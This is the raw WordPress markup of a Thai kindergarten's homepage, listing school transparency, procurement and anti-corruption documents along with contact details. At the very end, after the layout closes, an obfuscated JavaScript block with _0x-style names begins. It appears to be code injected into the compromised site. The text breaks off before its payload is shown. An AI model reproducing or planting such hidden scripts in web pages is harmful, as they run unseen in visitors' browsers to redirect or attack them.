เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1l-VlfXu6thxBFvL0JpgAcCUrTrqNNp4G/view?usp=drive_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 